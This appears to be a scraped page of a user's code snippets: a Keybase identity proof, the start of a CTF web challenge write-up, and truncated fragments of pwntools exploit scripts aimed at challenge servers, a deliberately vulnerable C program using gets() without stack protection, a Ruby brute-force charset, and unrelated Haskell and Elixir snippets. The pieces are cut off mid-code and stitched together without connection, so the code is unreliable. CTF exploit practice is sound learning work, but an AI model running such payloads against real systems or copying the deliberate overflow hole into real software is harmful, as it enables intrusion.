becojo

Keybase proof

I hereby claim:

I am becojo on github.
I am becojo (https://keybase.io/becojo) on keybase.
I have a public key ASDdAmE0DZMvcJtrbYQh4avfIgjYG5KNDc-2o4Ug8s3Y4Ao

To claim this, I am signing this object:

Login As Admin!(2)

http://login2.chal.mmactf.link/	Web	200 points

This challenge, at first, didn't seem vulnerable. Using the test credentials that were provided, we see that a random token is assigned to the user in a cookie named ss.

I finally stumbled onto something interesting when I submited a request the cookie ss present but with an empty value.

$ curl "http://login2.chal.mmactf.link/" --cookie "ss="

	from pwn import *

	context.arch = 'amd64'

	elf = ELF('./pwn150')
	# p = process('tee i \| ./pwn150', shell=True)
	p = remote("54.153.19.139", 5253)

	offset = 88

	from pwn import *

	# p = process('tee i \| ./pwn100', shell=True)
	p = remote("54.153.19.139",5251)

	calleax = 0x08048386

	payload = asm("jmp $+32")
	payload = payload.ljust(32 - 4)
	payload += p32(calleax)

	// gcc -fno-stack-protector -z execstack overflow.c -o overflow

	#include <stdio.h>

	int main(int argc, char *argv[]) {
	char buf[200];

	printf("%p\n", &buf);

	gets(buf);

	require 'http'

	charsets = {
	'[A-M]' => ('A'..'M').to_a,
	'[N-Z]' => ('N'..'Z').to_a,
	'[a-m]' => ('a'..'m').to_a,
	'[n-z]' => ('n'..'z').to_a,
	'[0-9]' => ('0'..'9').to_a,
	'[_\-\?!#$%]' => ["_", "-", '\?', '!', '#', '$', '%']
	}

	#!/usr/bin/env ruby

	require 'canal'

	if ARGV.empty?
	puts %q{usage: hexdump [hex hex hex ...]}
	else
	puts ARGV.map(&canal.chars
	.each_slice(2)
	.to_a

	{-# LANGUAGE FlexibleInstances, IncoherentInstances #-}

	import Control.Monad

	data Id a = Id a
	deriving Show

	instance Monad Id where
	(Id x) >>= f = f x
	return = Id

	defmodule Utils do
	def fix(f, x) do
	f.(&(fix(f, &1)), x)
	end

	def fix(f) do
	fn x ->
	fix(f, x)
	end
	end